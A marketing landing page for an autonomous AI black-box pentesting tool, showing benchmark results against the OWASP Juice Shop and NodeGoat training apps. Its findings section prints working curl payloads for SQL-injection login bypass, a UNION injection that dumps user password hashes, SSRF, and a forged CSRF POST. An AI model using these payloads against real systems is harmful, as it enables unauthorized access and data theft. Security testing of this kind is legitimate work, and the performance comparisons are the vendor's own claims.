Autonomous red-team ensemble · v0.4 preview

Pentest any web app.
No source code.
No configuration.
Just a URL.

Vexilium is a black-box AI pentester. Point it at any web app or API, and an ensemble of two engines (a deep single-session agent and a parallel red team) returns verified exploits. Every finding ships with a runnable curl. Source code never leaves your perimeter, because it's never touched.

No spam. We email once when your slot opens.

$ python -m agent.main --ensemble --target https://your-app.com
↳ ~10 minutes later
$ cat report.md
→ 11 verified exploits, 11 curl reproducers, 1 executive summary
87 seconds · live capture

One URL.
Eleven verified exploits.

Real run, sped up 10×. Captions are diegetic: the agent's own reasoning, payloads, and verifier outcomes. Nothing is cherry-picked or replayed. This capture is the deep single-engine run; the full ensemble adds a parallel red team for the numbers below.

Headline numbers
19
unique verified exploits across two web stacks, ensemble of two engines
Juice Shop 11 · NodeGoat 8
~10min
average runtime, fully autonomous, no human input
deep agent + red team
0
lines of source code accessed. Pure black-box.
vs. Shannon · vs. XBOW

Where the coverage comes from

OWASP Juice Shop
11 unique verified
deep agent 8 · red team 4 · found by both 1
OWASP NodeGoat
8 unique verified
deep agent 6 · red team 5 · found by both 3

Neither engine alone finds the full set. The deep agent's persistent session catches stateful, chained bugs (server-side JS injection → RCE), while the red team's parallel specialists catch breadth (SSRF, NoSQL injection, broken access control on endpoints the deep agent never reached). The ensemble reports their deduplicated union.
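The per-target totals follow from set arithmetic on the breakdown above. A minimal sketch, assuming each finding has a stable ID; the IDs and the `ensemble_counts` helper are hypothetical, and only the counts come from the figures above:

```python
def ensemble_counts(deep_total: int, red_total: int, both: int) -> dict:
    """Rebuild the two engines' finding sets from the published counts."""
    # Placeholder IDs: only the set sizes are taken from the page.
    shared = {f"both-{i}" for i in range(both)}
    deep = {f"deep-{i}" for i in range(deep_total - both)} | shared
    red = {f"red-{i}" for i in range(red_total - both)} | shared
    return {
        "deep": len(deep),
        "red": len(red),
        "both": len(deep & red),   # found by both engines
        "union": len(deep | red),  # what the ensemble reports
    }


juice_shop = ensemble_counts(deep_total=8, red_total=4, both=1)
nodegoat = ensemble_counts(deep_total=6, red_total=5, both=3)
print(juice_shop["union"], nodegoat["union"], juice_shop["union"] + nodegoat["union"])
```

For Juice Shop that is 8 + 4 − 1 = 11, for NodeGoat 6 + 5 − 3 = 8, and 19 in total.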

Same target. Same conditions. No human config.

Tool | Target | Runtime | Verified active exploits
Vexilium · ensemble | OWASP Juice Shop | ~10 min · two engines | 11
Vexilium · ensemble | OWASP NodeGoat | ~10 min · two engines | 8
OWASP ZAP baseline | Juice Shop | ~5 min | 0 (10 passive)
Nuclei v3.8 · 6,618 templates | Juice Shop | 7m 32s | 0 (1 passive)

Industry-standard scanners (same network, same machine, default config) found zero active exploits. Across 14,000+ requests and 6,618 templates, Nuclei matched a single passive metrics endpoint. Vexilium's ensemble landed 19 working exploits across two unrelated web stacks, spanning auth bypass, SQLi, SSRF, NoSQL injection, IDOR, CSRF, and server-side JS injection → RCE.

How it works · ensemble

Two engines. One verified union.

Recon and auth run once and share a session. Then two engines attack the same surface from different angles, one for depth, one for breadth, and a critic plus a deterministic verifier merge what survives into a single deduplicated report.

01 / RECON + AUTH

Map once. Log in once.

A recon agent fingerprints the framework and enumerates the API surface; an auth agent establishes one session and shares it on a blackboard. Every request is scope-locked to the target's host:port at the tool layer.

GET /api/Products
POST /rest/user/login (session shared)
scope locked: host:port
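
What a host:port scope lock could look like at the tool layer, as a rough sketch rather than Vexilium's actual code. The `host_port` and `in_scope` helpers are hypothetical names, and the default-port handling is an assumption:

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def host_port(url: str) -> tuple[str, int]:
    """Normalize a URL to (hostname, port), filling in the scheme's default port."""
    parts = urlsplit(url)
    if parts.scheme not in DEFAULT_PORTS or parts.hostname is None:
        raise ValueError(f"unsupported or malformed URL: {url!r}")
    port = parts.port or DEFAULT_PORTS[parts.scheme]
    return parts.hostname.lower(), port


def in_scope(target: str, request_url: str) -> bool:
    """Allow a request only if it goes to the target's exact host and port."""
    try:
        return host_port(request_url) == host_port(target)
    except ValueError:
        return False  # malformed URLs and non-HTTP schemes are refused


print(in_scope("http://localhost:3000", "http://localhost:3000/rest/user/login"))
print(in_scope("http://localhost:3000", "http://localhost:4000/research"))
```

Comparing normalized (host, port) pairs rather than URL prefixes avoids lookalike hosts such as `localhost:3000.evil.com` passing a naive string check.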
02 / TWO ENGINES

Depth and breadth, in parallel.

A single deep-session agent chains multi-step attacks down one path; a red team of specialists sweeps the surface in parallel. Different angles, same target: the union is larger than either alone.

deep agent → SSJI → RCE /contributions
red team → SSRF, NoSQL, broken-access ×N
↳ low overlap, wide coverage
03 / MERGE + VERIFY

Prove it. Then dedupe.

A critic adversarially challenges every candidate; a per-class verifier rejects anything without observable exploit evidence. Survivors merge into one report, tagged by which engine found each.

VERIFIED sqli /rest/user/login [deep]
VERIFIED ssrf /research [red team]
↳ merged · 11 unique · 1 found by both
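
The verify-then-merge step can be pictured roughly as below. This is an illustrative sketch, not the shipped verifier: the `Candidate` type, the two evidence checks, and `merge_verified` are all hypothetical, and the critic stage is left out.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Candidate:
    vuln_class: str  # e.g. "sqli", "ssrf"
    endpoint: str
    engine: str      # "deep" or "red team"
    evidence: str    # response excerpt captured during the attempt


# Hypothetical per-class evidence checks; real verifiers would be stricter.
VERIFIERS = {
    "sqli": lambda ev: '"token"' in ev,        # login returned a token
    "ssrf": lambda ev: "<html" in ev.lower(),  # fetched page came back
}


def merge_verified(candidates):
    """Keep candidates with exploit evidence, deduped by (class, endpoint)."""
    merged = {}
    for c in candidates:
        check = VERIFIERS.get(c.vuln_class)
        if check is None or not check(c.evidence):
            continue  # no verifier for the class, or no observable evidence
        merged.setdefault((c.vuln_class, c.endpoint), set()).add(c.engine)
    return {key: sorted(engines) for key, engines in merged.items()}


candidates = [
    Candidate("sqli", "/rest/user/login", "deep", '{"authentication":{"token":"eyJ0eXA..."}}'),
    Candidate("sqli", "/rest/user/login", "red team", '{"authentication":{"token":"eyJ0eXA..."}}'),
    Candidate("ssrf", "/research", "red team", "<html>internal dashboard</html>"),
    Candidate("sqli", "/rest/products/search", "red team", "HTTP 500"),
]
report = merge_verified(candidates)
for (vuln_class, endpoint), engines in report.items():
    print("VERIFIED", vuln_class, endpoint, engines)
```

Keying on (class, endpoint) is one possible dedupe rule; it collapses the login SQLi found by both engines into a single entry tagged with both.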

The moat is the data. Every customer run logs (target_fingerprint, payload, verifier_outcome): a binary signal, not noisy chat traces. That dataset trains specialist 7B–32B models that beat frontier models on cost and latency for this narrow task. Open-source tools can replicate the agent; they cannot replicate the dataset.
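
One way to picture a logged record, as a sketch only. The three field names come from the tuple above; the `RunRecord` type, the JSON Lines serialization, and the example fingerprint value are assumptions:

```python
import json
from dataclasses import asdict, dataclass


@dataclass(frozen=True)
class RunRecord:
    target_fingerprint: str  # e.g. detected framework; format is assumed
    payload: str             # the exact string that was sent
    verifier_outcome: bool   # binary label: exploit verified or not


def to_jsonl(records) -> str:
    """Serialize records as one JSON object per line."""
    return "\n".join(json.dumps(asdict(r), sort_keys=True) for r in records)


records = [
    RunRecord("express", "' OR 1=1--", True),  # "express" is a made-up fingerprint
    RunRecord("express", "' OR 1=2--", False),
]
print(to_jsonl(records))
```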

The attack surface

Every endpoint is a pixel.
Two engines map the whole sphere.

The deep agent drills one path to the core; the red team sweeps the perimeter in parallel. Together they leave no facet untested.

Sample of last run

Verified findings.
Working curl reproducers, every time.

SQLi · auth bypass Juice Shop · turn 6

Admin login bypassed with one string

' OR 1=1-- on /rest/user/login returns a valid admin JWT. Role admin, full access.

$ curl -X POST localhost:3000/rest/user/login \
  -H 'Content-Type: application/json' \
  -d '{"email":"'\'' OR 1=1--","password":"x"}'
↳ {"authentication":{"token":"eyJ0eXA..."}}
UNION SQLi · data exfil Juice Shop · turn 13

Every user's password hash, exfiltrated

UNION SELECT on /rest/products/search leaks the full Users table: emails, MD5 hashes, roles for all 23 accounts.

$ curl -G localhost:3000/rest/products/search \
  --data-urlencode "q=apple')) UNION SELECT id,email,password,role,4,5,6,7,8,9 FROM Users--"
↳ 23 rows · admin@juice-sh.op · 0192023a7bbd...
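
The search payload contains spaces, quotes, and parentheses, so it has to be percent-encoded before it goes into a query string. A minimal Python sketch of that encoding step, using only the standard library; the `http://` scheme and the variable names are assumptions, and nothing is sent:

```python
from urllib.parse import parse_qs, urlencode, urlsplit

# Payload copied from the reproducer above.
payload = "apple')) UNION SELECT id,email,password,role,4,5,6,7,8,9 FROM Users--"

# urlencode percent-encodes reserved characters and turns spaces into "+".
url = "http://localhost:3000/rest/products/search?" + urlencode({"q": payload})
print(url)

# Round trip: decoding the query string recovers the exact payload.
decoded = parse_qs(urlsplit(url).query)["q"][0]
print(decoded == payload)
```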
SSRF · internal proxy NodeGoat · turn 18

Server fetches arbitrary URLs on demand

/research?url= proxies any URL through the server and returns the response body. That opens internal recon and data exfil via internal endpoints: full-response SSRF, not just blind.

$ curl "localhost:4000/research?url=http://localhost:4000/dashboard"
↳ <internal dashboard HTML returned>
CSRF · state change NodeGoat · turn 15

Cross-origin POST modifies retirement allocations

/contributions accepts forged POSTs with an attacker-controlled Referer and no CSRF token. The agent quoted the commented-out fix from the page source as evidence.

$ curl -X POST localhost:4000/contributions \
  -H 'Referer: http://evil.com/csrf.html' \
  -d 'preTax=99&roth=0&afterTax=0'
↳ HTTP 200 · "Contributions updated successfully."
Why black-box

Source-code AI pentesters serve the easy half of the market.
We serve the rest.

vs. Shannon (white-box)

Requires source-code ingestion. Excludes external pentest, vendor-risk review, bug-bounty research, and every regulated buyer that can't ship source to a US AI vendor.

vs. XBOW (enterprise findings)

Enterprise SaaS sells reports to security teams. We ship verified exploits with curl reproducers into the developer workflow: PR-integrated, per-commit, continuous.

vs. ZAP / Nuclei (template-based)

Template-based scanners find missing headers and metrics endpoints. In the default-config runs above they bypassed no auth, exfiltrated no data, and chained no attacks. Vexilium did all three.

Join the waitlist

Get early access.
Be first in line when Vexilium opens.

We're rolling out to a small set of design partners first. Join the waitlist and we'll reach out before public launch, usually with a personal walkthrough tailored to your stack.

// We respond within 48 hours. No spam, ever.